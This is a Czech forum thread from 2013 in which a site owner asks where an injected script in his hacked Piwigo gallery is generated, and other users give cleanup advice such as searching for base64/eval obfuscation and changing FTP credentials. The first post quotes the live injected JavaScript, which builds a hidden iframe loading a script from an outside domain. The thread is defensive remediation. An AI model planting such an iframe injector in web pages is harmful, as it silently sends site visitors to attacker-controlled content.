Autor | Zpráva | ||
---|---|---|---|
Pavel Kadlec Profil |
Zdravím
Chtěl bych se zeptat když si dám view-source:http://www.elektromontaze-vk.cz/piwigo/ Tak se zobrazí uvodní stránka piwiga ale jelikož stránky byly napadeny havěti tak zbyva posledni script ktery se mi nedari odstranit protože nevim kde a jak piwigo vytvari hlavní stránku jedná se o kod na hlavní stránce <script type="text/javascript" language="javascript" > (function () { var id = '4'; var gocw09 = document.createElement('iframe'); gocw09.src = 'http://hotel-schoener-brunnen.de/traf.php'; gocw09.style.position = 'absolute'; gocw09.style.border = '1'; gocw09.style.height = '31px'; gocw09.style.width = '42px'; gocw09.style.left = '500px'; gocw09.style.top = '100px'; if (!document.getElementById('gocw')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'gocw\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('gocw').appendChild(gocw09); }})();</script> Mužete mi někdo poradit v jakém souboru to najdu? hledám io přes Notepad++ a nic... |
||
scheras Profil * |
#2 · Zasláno: 15. 3. 2013, 09:24:35
To se težko takhle od počítače bez přístupu k systému odhaduje. Doporučil bych Vám prozkoumat databázy, jestli není něco tam. Pokud budete neúspěšný, vzal bych si index.php, ten prohledal a postupoval po souborech, které on si do sebe vkládá. A nebo zkusit vyhledat, jestli nějaký ze souboru neobsahuje klíčová slova jako třeba http://hotel-schoener-brunnen.de apod.
|
||
Pavel Kadlec Profil |
#3 · Zasláno: 15. 3. 2013, 12:16:48
scheras:
Já to opravdu právě zkoušel a nic to nenašlo to je jako kdyby to pořád něco generovalo ale nevím kam na FTP nic takového není stáhnul jsem celý obsah a prohledal ho pomocí klíčových slov v textu atd. Jediný tento problém mi to nenašlo jinak vše ostatní jsem v pořádku odstranil. |
||
TomasJ Profil |
#4 · Zasláno: 15. 3. 2013, 12:38:48
Podle mě nenajdete nic podle klíčových slov, protože bude pravděpodobně uložený v nějakém zakódovaném řetězci (např. base64 bývá obvyklé kódování + eval). Zkuste prostě najít nějaký eval, base64_decode a prostě projíždět řádky po řádcích.
|
||
Pavel Kadlec Profil |
#5 · Zasláno: 15. 3. 2013, 12:53:43
TomasJ:
Je to vlastně příklad když si najedete na stránku http://www.elektromontaze-vk.cz/piwigo/ a dáte si zobrazit zdrojový kod tak přesně tu stránku chci najít na FTP ale v indexu a co jsem prolítnul vše nic neni a nemůžu to dohledat:/ to je právě ten jediný zbývajcí script co chybí odstranit, bylo jich tam celkem kolem 200 což se v pořádku odstranilo ale tento jediný zůstává.
|
||
TomasJ Profil |
Pavel Kadlec:
Jak říkám, může to být zakódované v base64 a nebo dokonce i tahat z jiné adresy. Mimochodem na stránce vidím pouze iframe nějaké německé stránky EDIT: Omlouvám se, o tom přeci píšete... |
||
Pavel Kadlec Profil |
#7 · Zasláno: 15. 3. 2013, 17:24:47
TomasJ:
ano a tu je třeba dát pryč |
||
TomasJ Profil |
#8 · Zasláno: 15. 3. 2013, 17:28:43
Podívejte se jaké soubory includujete za elementem <div> s id the_page. Tam to musí být.
|
||
Pavel Kadlec Profil |
#9 · Zasláno: 15. 3. 2013, 18:23:32
TomasJ:
kouknu se na to snad budu mít štěstí |
||
Alphard Profil |
#10 · Zasláno: 16. 3. 2013, 01:38:57
Zmíněný kód už na dané stránce není, takže asi vyřešeno. Nicméně v duchu Máte na webu virus — co s tím? doporučuji pátrat po příčině. Změnit heslo na ftp, zkontrolovat počítač na viry, zkontrolovat, jestli v aplikaci není díra.
|
||
Časová prodleva: 11 let
|
0